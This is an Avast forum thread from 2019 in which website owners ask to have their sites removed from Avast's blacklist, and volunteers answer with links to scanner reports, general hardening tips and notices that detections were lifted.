https://www.avast.com/false-positive-file-form.php

https://forum.avast.com/index.php?topic=14433.msg1289438#msg1289438

I made an application yesterday. When do I get results?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 19, 2019, 01:31:56 PM
H furkaan23,

Medium security risk is being reported here via TLS recommendations:
https://sitecheck.sucuri.net/results/https/azra.com.tr

Erlend Oftedal's scanner found 3 retirable jQuery libraries: https://retire.insecurity.today/#!/scan/d4e550d5f4172de10ce7ba9b4ad72ff0bcc811f82254b50427a0c704e4390171

Website scanned with a linter produced follwing 553 hints (general and security related):
https://webhint.io/scanner/1f21c397-2a25-4db5-afac-27054254a272

SSL not available, so vulnerable to MiM attacks,
Excessive info proliferation: X-Powered-By-header exposed,
Vulnerable to Cross-Site-Attacks, http-only-cookies not used,
SPF not enabled, so  not mail can be fraudulently sent. (source UpGuard cloud scanner results).

No alerts given here: https://urlquery.net/report/2d34b7e4-d6e7-4555-93e4-844f02485598
but as you see there alerts for other domains, that share your IP, probably reason avast flagged your site.

Wait for an avast team member to come and unblock,
'do with the improvement recommendations, I gave here, as you see fit,
but work towards using "best policies".

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on June 20, 2019, 02:05:39 AM
This site hxxps://azra.com.tr seems to have been blacklisted by avast. How to fix this?

Detection has been removed 19.06.2019

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided website isn't detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: Dave335 on July 18, 2019, 10:14:22 AM
Hi,

Our website has been blacklisted yet its clean - site https://rak.co.ke

Please HELP!DPM
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on July 18, 2019, 10:24:56 AM
-> https://sitecheck.sucuri.net/results/https/rak.co.ke
-> https://www.virustotal.com/gui/url/4b136d1232ed31a4d7fd5c2b49c013c3ff9aa70f32f6aea0937b9458a9f3d76a/detection
Title: Re: How to remove my website from your blacklist?
Post by: Milos on July 18, 2019, 01:32:18 PM
Hello,
report it through https://www.avast.com/false-positive-file-form.php, please.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: larry189 on July 25, 2019, 03:02:41 AM
I rebuild a site from another hosting location. It had a virus at the other location, but this is totally new, and I've tested it with all your suggested scanners, and checked it on the black list site, so they are not showing clean.  Do I need to do anything else to remove it from your black list??  site is

https://cjspaintballpark.com

Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: mchain on July 25, 2019, 08:41:34 AM
I rebuild a site from another hosting location. It had a virus at the other location, but this is totally new, and I've tested it with all your suggested scanners, and checked it on the black list site, so they are not showing clean.  Do I need to do anything else to remove it from your black list??  site is

https://cjspaintballpark.com

Thanks!
https://sitecheck.sucuri.net/results/https/cjspaintballpark.com (https://sitecheck.sucuri.net/results/https/cjspaintballpark.com)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 25, 2019, 11:18:21 PM
Now unreachable website.

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on July 27, 2019, 12:20:09 AM
I rebuild a site from another hosting location. It had a virus at the other location, but this is totally new, and I've tested it with all your suggested scanners, and checked it on the black list site, so they are not showing clean.  Do I need to do anything else to remove it from your black list??  site is

hxxps://cjspaintballpark.com

Thanks!

Detection has been removed

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided website isn't detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: Jaynie on July 31, 2019, 12:05:49 AM
Hello,

For some reason our website https://account.claimleader.com/  is reported as being in the Avast blacklist. We have never had an issue with this before with any other anti-virus software. The solution we are telling our clients is to remove Avast all together in order to use our website. They are adding our website to the "Exceptions" list but some are still having issues.

 Any help would be appreciated.

Thank you,
Jaynie
Title: Re: How to remove my website from your blacklist?
Post by: VladK on August 01, 2019, 01:39:37 PM
https://account.claimleader.com/ is unblocked, it was a false positive alert.
Title: My website is also blocked by avast.
Post by: Dan Horea on August 14, 2019, 11:00:50 AM
Hello!
I am the administrator of the www.carduri.uk website.

We had some problems in the past with this website and now we have cleaned it , moved the hosting provider and reconstruct the website from scratch.

When I try to access the website security check using the online tool provided by Sucuri https://sitecheck.sucuri.net/results/carduri.uk the only remaining problem of this website is that is blacklisted by your company.

So, please reanalyse the website and if there are still some problems with it tell me what those problems are, if not please remove the website from your blacklist, or tell me what do I need to do to achieve that.

Thank you very much!

Best regards,
Horea George Dan
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on August 14, 2019, 11:37:46 AM
You can report a suspected FP (File/Website) here: https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 14, 2019, 12:29:32 PM
Your WordPress version is outdated, update a.s.a.p. WordPress Version 4.9.10
Probably an IP flagged because of abuse by those that share this with you:
https://www.abuseipdb.com/check/31.14.13.135 and https://checkphish.ai/ip/31.14.13.135
Vulnerabilites: https://app.upguard.com/webscan#/http://www.carduri.uk/
DNS8 flags site as suspicious: https://app.upguard.com/webscan#/http://www.carduri.uk/

Site is flagged as a PHISH, wait for an avast team member to give the final verdict,
as we here are volunteers with relative knowledge, but cannot unblock.

polonus
Title: Re: My website is also blocked by avast.
Post by: jefferson sant on August 15, 2019, 03:16:33 PM
Hello!
I am the administrator of the wxw.carduri.uk website.

We had some problems in the past with this website and now we have cleaned it , moved the hosting provider and reconstruct the website from scratch.

When I try to access the website security check using the online tool provided by Sucuri https://sitecheck.sucuri.net/results/carduri.uk the only remaining problem of this website is that is blacklisted by your company.

So, please reanalyse the website and if there are still some problems with it tell me what those problems are, if not please remove the website from your blacklist, or tell me what do I need to do to achieve that.

Thank you very much!

Best regards,
Horea George Dan

Detection has been removed 14.08.2019

Quote from: Avast
Our virus specialists have been working on this problem and it has now been resolved. The provided website isn't detected by Avast anymore.
Title: Re: How to remove my website from your blacklist?
Post by: trspencer on August 24, 2019, 04:36:09 AM
Hello -

https://www.mylakeshoredental.com was recently transferred to our environment from an infected host. New content, new hardware, nothing was transferred from the previous environment.

Can you please recheck site and remove from blacklist?

https://sitecheck.sucuri.net/results/https/www.mylakeshoredental.com

Thank you!
Tim
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on August 24, 2019, 04:45:20 AM
You can report a suspected FP (File/Website) here: https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 24, 2019, 04:44:16 PM
Found threats to site: https://app.upguard.com/webscan#/https/www.mylakeshoredental.com

Indicators of compromise (iocs): https://urlscan.io/result/8d158394-29f2-45c9-be21-7309d47928c9#iocs
But wait for a final verdict from an avast team member

Also consider: https://www.virustotal.com/gui/url/f9f771d0e34c4515454b75d5bb05e2438002745460771b60ae6ec5b3278a35d7/details

Certain improvement recommendations found via linting:
https://webhint.io/scanner/3fadf059-5704-40ab-a0de-fbb186d10991
https://urlscan.io/result/8d158394-29f2-45c9-be21-7309d47928c9

Nothing found: https://www.urlvoid.com/scan/mylakeshoredental.com/

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on August 26, 2019, 03:49:11 PM
Hello -

hxxps://www.mylakeshoredental.com was recently transferred to our environment from an infected host. New content, new hardware, nothing was transferred from the previous environment.

Can you please recheck site and remove from blacklist?

https://sitecheck.sucuri.net/results/https/www.mylakeshoredental.com

Thank you!
Tim

Detection was removed in 26.08.2019 08:43 AM.

Quote from: Avast
Our virus specialists have now cleared its reputation in our database.

With URLs this change should be instant, but it might take up to 24 hours with files.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 26, 2019, 08:48:24 PM
Thanks to jefferson sant for the apt status response.
we all here owe you for doing this, great job.  ;)

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on August 27, 2019, 04:29:25 AM
Thanks to jefferson sant for the apt status response.
we all here owe you for doing this, great job.  ;)

polonus

You're welcome.I have bad news less time now for this in the next days : (
There is no doubt that they have been working the at best even if some are on vacation

https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: SCompartir on September 10, 2019, 06:18:37 PM
Hello,

We need your help to review one of our sites.
Some users are receiving Avast phishing alerts on the following page: http://lms30.santillanacompartir.com/

I checked the link and it looks clean:
https://www.virustotal.com/gui/url/4ed49a96f5b774bb096c7adfb0f2fe88c3abb0660c18cc77ee5ed58f264bb69e/detection
https://www.urlvoid.com/scan/lms30.santillanacompartir.com/

Can you please remove it from the list?
thanks in advance
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on September 10, 2019, 10:16:26 PM
Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php



Title: Re: How to remove my website from your blacklist?
Post by: SCompartir on September 12, 2019, 05:58:27 PM
Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php

Thanks Podus.

We reported it yesterday but we still have no solution. It is an important issue that is causing problems in the schools that use our software.
Any help is very much appreciated
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on September 12, 2019, 10:36:14 PM
Reported to Avast. Hope that helps.
Title: Re: How to remove my website from your blacklist?
Post by: Milos on September 13, 2019, 07:46:33 AM
Hello,
it should be fixed.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: heidiw on September 27, 2019, 07:49:21 PM
Hello, our site has been blacklisted but gets a clean report from every testing site, including virustotal.com and urlvoid.com. I've probably tested and retested on at least a dozen different sites with the same results.

I've submitted to Avast's "Report a False Positive" form linked above, but thought I'd check in here for additional guidance. Our site is hbsslaw.com.

Thank you in advance for any help,
Heidi
Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 28, 2019, 11:36:53 AM
Hi heidiw,

Has that shellscript malware now left you?
Seems OK here: https://www.virustotal.com/gui/domain/hbsslaw.com/details

See various detections in communicating files and files referring:
https://www.virustotal.com/gui/ip-address/104.248.8.42/relations  (shellscript malware)
-> https://www.virustotal.com/gui/file/e1c40eab45d98265548859ffb3df941bb7329e01f5ddb08e3b98c3c1c3a83175/detection

Recommendations acquired via linting to improve your website:
https://webhint.io/scanner/ad92d914-488d-4594-bda6-0fe00ee5954a

See existing vulnerabilities on the hoster of the webserver for IP: https://www.shodan.io/host/104.248.8.42
N.B. The device at Clifton may not be impacted by all of these issues.
The vulnerabilities are implied based on the software and version.

Wait for the final verdict of an avast team member, as we here are volunteers with releative knwoledge,
but only avast team members can come and unblock (whenever that is advisable)

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)


Title: Re: How to remove my website from your blacklist?
Post by: vickykuo on September 30, 2019, 04:02:31 AM
Hello

My company website "mydesigncell.com" is blocked by avast

But my website is safe now

Please  remove my website from your blacklist

Thanks~~!!!
Title: Re: How to remove my website from your blacklist?
Post by: Michael (alan1998) on September 30, 2019, 05:33:17 AM
You're blacklisted by ZeroCERT >> https://www.urlvoid.com/scan/mydesigncell.com/
VirusTotal reports Suspicious >> https://www.virustotal.com/gui/url/9c3cef781db545947cdb87ee959c9d2504fe1394d9bdc2e47df29ffb0c0b9c29/detection

Sucuri reports outdated nginx >> https://sitecheck.sucuri.net/results/www.mydesigncell.com

One of your subdomains (share(dot)mydesigncell(dot)com) is tagged for malware.

Primary >> https://zulu.zscaler.com/report/f8cfb7aa-0a5f-45f4-bf3e-c419bdc51ac2
Share (SD) >> https://zulu.zscaler.com/submission/a74d1606-7a6d-4ac2-9088-85f1bbaad50c

Can't for the life of me get URLQuery.net working (@polonus)??

You had a spam problem at one point I take it? (>1 year old) >> https://exchange.xforce.ibmcloud.com/url/mydesigncell.com
JS:Downloader >> https://exchange.xforce.ibmcloud.com/malware/20FC20EE7D21686397F7CFFF968CDFA6

AW-SNAP! (https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=c2h8fXsubXkje3NbZ25ee2xsLl5dbQ%3D%3D~enc)

Wait for official reply from Avast!

Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 30, 2019, 01:17:57 PM
@ Michael (alan1998) & vickykuo,

Michael (allan 1998) quite impressive in the scan results.
Walk in my shoes, a very present surprise for me.
Domain is at constant risk of being hijacked, that is the main threat there.

Also interesting are the detections, that one will get via Virustotal's relations on that IP,
see: https://www.virustotal.com/gui/ip-address/67.20.76.105/relations
and that "suspicious"domain is parading there as nuber 3 and 4 in the list:
https://www.virustotal.com/gui/url/73d01d1a40280ff5b32a5c6ec24b6e7c091c61d60035d1e8d8f85c40d9172cb4/detection
and https://www.virustotal.com/gui/url/e7ece1957115a109f44c349f9884b03a398058b070a6c7da4bd6e5582b2f8529/detection

The threats against this website, 12 immediate threats mentioned here: https://webscan.upguard.com/#/www.mydesigncell.com

One should be interested in URLQuery.net results because of it having Forcepoint Threatseeker aboard,
Emerging Threats and other IDS. URLQuery. net is not very popular by cybercriminals that wanna stay under the radar,
so it has come under continuous attack. Remember Clean-MX once, that is now only open for members with a personal account.

Here you got what you were after. However I won't reveal how I got there, as the baddies are looking over my shoulder as well:
https://urlquery.net/report/270ef31c-6fc1-410d-9120-9bcc462c88c5

As Michael (alan1198) said wait for a reaction from an avast team member,
as they are the only ones to come and unblock),
we are just the folks with relative knowledge on website security and error-hunting.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: How to remove my website from your blacklist?
Post by: Michael (alan1998) on September 30, 2019, 01:26:40 PM
@ Michael (alan1998) & vickykuo,

Michael (allan 1998) quite imperessive in the scan results.
Walk in my shoes, a very present surprise for me.
Domain is at constant risk of being hijacked, that is the main threat there.

I'm still no where near you're level :P. I'll see about reaching out to URLQuery and getting an account. Can't find an email, but DM'd them on Twitter. Their account doesn't appear active though :/
Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 30, 2019, 02:00:19 PM
Hi Michael (alan 1998),

Don't be too modest now, you are one of my best adepts  ;)
Oh well, and you should know now how to get to these urlquery dot net results by now  8)

Damian
Title: Re: How to remove my website from your blacklist?
Post by: heidiw on September 30, 2019, 05:01:49 PM
Thank you, Polonus, for responding to my message.

I am not familiar with what shellscript malware is or what we can do to remove it. I'll send your message to our web development team and our internal IT team.

Are you available for hire to help us as a consultant? or could you recommend someone?

Thank you,
Heidi Waggoner
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on September 30, 2019, 05:46:26 PM
Quote
........ or could you recommend someone?
These guys know all there is to know   >>  https://sucuri.net/


Title: Re: How to remove my website from your blacklist?
Post by: heidiw on September 30, 2019, 10:04:33 PM
would https://sucuri.net/ know how to fix the issues too? or even better, be able to fix the issues?
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on September 30, 2019, 10:30:14 PM
would https://sucuri.net/ know how to fix the issues too? or even better, be able to fix the issues?
You have to ask Sucuri 


Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on September 30, 2019, 11:23:29 PM

Report a false positive (select file or website)
https://www.avast.com/false-positive-file-form.php
Title: Re: How to remove my website from your blacklist?
Post by: jadaun011 on October 01, 2019, 10:35:38 AM
I was on a call with one of my customer and He was trying to access my website but He see the alert by Avast that the "This website is unsafe"

My website wad infected with malware a few months ago and it was completely cleaned a couple of weeks ago ...and I see there is no malicious files or contents at the moment..


Here is my website URL: https://b2binternationalgroup.com/

can you please check and help me with whitelisting of the website.

Thanks!
Title: Re: How to remove my website from your blacklist?
Post by: JimmyChen on October 01, 2019, 11:54:19 AM
Hello,

Our website vcloud-vrli.cloud-ii.com is reported as being in the arvast blacklist.

We are sure that our website is clean, have checking on www.urlvoid.com / www.virustotal.com, can help remove it from your blacklist.

Sincerely,
Title: Re: How to remove my website from your blacklist?
Post by: Michael (alan1998) on October 01, 2019, 02:11:38 PM
I was on a call with one of my customer and He was trying to access my website but He see the alert by Avast that the "This website is unsafe"

My website wad infected with malware a few months ago and it was completely cleaned a couple of weeks ago ...and I see there is no malicious files or contents at the moment..


Here is my website URL: https://b2binternationalgroup.com/

can you please check and help me with whitelisting of the website.

Thanks!

Second time I've seen Nielsen associated (closely that is) with spam. The other attempt being a weird phishing email that a user got that I manage.

Your website has Directory Listing enabled (See here) >> https://sitecheck.sucuri.net/results/https/b2binternationalgroup.com
Zulu gives all clear >> https://zulu.zscaler.com/submission/ae71a267-6502-467e-b55f-58b7299667a1
URLVoid is OK >> https://www.urlvoid.com/scan/b2binternationalgroup.com/
URLScan gives Verdict: Unknown (not uncommon) >> https://urlscan.io/result/ed791ca7-bf99-46f0-8bee-09451821f16f
Spam issue from 2017 >> https://exchange.xforce.ibmcloud.com/url/b2binternational.com
XFE doesn't mind the IP >> https://exchange.xforce.ibmcloud.com/ip/146.66.102.157
VT clear URL >> https://www.virustotal.com/gui/url/210560ae46f78a67db067ccd85cbac03add5528e4392119ae40010e0875728d6/detection

Interesting that VT served a different IP compared to URLScan (related to Dynamic IP's found in XFE?) 212.84.78.149

XFE on new IP >> https://exchange.xforce.ibmcloud.com/ip/212.84.78.149
Aw-snap! (https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LmIyYltudHt9bnx0W11ufGwuXl1t~enc)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 01, 2019, 02:28:01 PM
Hi JimmyChen,

Your website does not kick up any content: https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=dl5sXXUjLXZ9bFsuXmxddSMtW1suXl1t~enc
There is something wrong with the implementation: https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=dl5sXXUjLXZ9bFsuXmxddSMtW1suXl1tYGxdZ1tuO2pze3NzW11uWyM9Xjc5ezF8RjAjODVeXnsjN3w4ezE4NjcxIzc4fDVCQjQ8bF1nW25VfWw9JTJGW24je3g%3D~enc  This due to a redirect.
No malware detected: https://www.virustotal.com/gui/url/15ac5f01217ab3c8143b5c2c9c0b1b364e23d141e0cdae7234532eab4ce757ca/detection
Neither here: https://www.virustotal.com/gui/ip-address/125.227.4.93/relations

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: jadaun011 on October 02, 2019, 04:11:31 PM
Hi,

I have fixed those "Directory Listing enabled" and other issues ..if you can check again..?

I was on a call with one of my customer and He was trying to access my website but He see the alert by Avast that the "This website is unsafe"

My website wad infected with malware a few months ago and it was completely cleaned a couple of weeks ago ...and I see there is no malicious files or contents at the moment..


Here is my website URL: https://b2binternationalgroup.com/

can you please check and help me with whitelisting of the website.

Thanks!

Second time I've seen Nielsen associated (closely that is) with spam. The other attempt being a weird phishing email that a user got that I manage.

Your website has Directory Listing enabled (See here) >> https://sitecheck.sucuri.net/results/https/b2binternationalgroup.com
Zulu gives all clear >> https://zulu.zscaler.com/submission/ae71a267-6502-467e-b55f-58b7299667a1
URLVoid is OK >> https://www.urlvoid.com/scan/b2binternationalgroup.com/
URLScan gives Verdict: Unknown (not uncommon) >> https://urlscan.io/result/ed791ca7-bf99-46f0-8bee-09451821f16f
Spam issue from 2017 >> https://exchange.xforce.ibmcloud.com/url/b2binternational.com
XFE doesn't mind the IP >> https://exchange.xforce.ibmcloud.com/ip/146.66.102.157
VT clear URL >> https://www.virustotal.com/gui/url/210560ae46f78a67db067ccd85cbac03add5528e4392119ae40010e0875728d6/detection

Interesting that VT served a different IP compared to URLScan (related to Dynamic IP's found in XFE?) 212.84.78.149

XFE on new IP >> https://exchange.xforce.ibmcloud.com/ip/212.84.78.149
Aw-snap! (https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LmIyYltudHt9bnx0W11ufGwuXl1t~enc)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on October 02, 2019, 04:24:20 PM
Google gives an all green verdict here: https://urlscan.io/result/4199a5d4-3b27-4ca1-9f30-ae5b8dab3b05
Still giving a PHISHing alert in Avast Secure Browser.
Showing site issues: https://sitecheck.sucuri.net/results/https/b2binternationalgroup.com

Update plug-ins when appropriate: The following plugins were detected by reading the HTML source of the WordPress sites front page.

wordpress-seo 12.1   latest release (12.2)
https://yoa.st/1uj
elementor 2.7.2   latest release (2.7.3)
https://elementor.com/
table-of-contents-plus 1601   latest release (1601)
http://dublue.com/plugins/toc/
sitepress-multilingual-cms   
tablepress 1.9.2   latest release (1.9.2)
https://tablepress.org/
genesis-responsive-slider 1.0.1   latest release (1.0.1)
https://www.studiopress.com
SD-mobile-nav

Reputation Check
PASSED
Google Safe Browse:OK
Spamhaus Check:OK
Abuse CC:OK
Dshield Blocklist:OK
Cisco Talos Blacklist:OK
Web Server:
-nginx
X-Powered-By:
None
IP Address:
-146.66.102.157
Hosting Provider:
SoftLayer Technologies Inc.
Shared Hosting:
1 sites found on -146.66.102.157

polonus
Title: Re: How to remove my website from your blacklist?
Post by: jefferson sant on October 07, 2019, 02:16:07 PM
I was on a call with one of my customer and He was trying to access my website but He see the alert by Avast that the "This website is unsafe"

My website wad infected with malware a few months ago and it was completely cleaned a couple of weeks ago ...and I see there is no malicious files or contents at the moment..


Here is my website URL: hxtps://b2binternationalgroup.com/

can you please check and help me with whitelisting of the website.

Thanks!

Detection was removed in 07.10.2019 at 05:14 AM.

Quote from: Avast
Our virus specialists have now cleared its reputation in our database.

With URLs this change should be instant, but it might take up to 24 hours with files.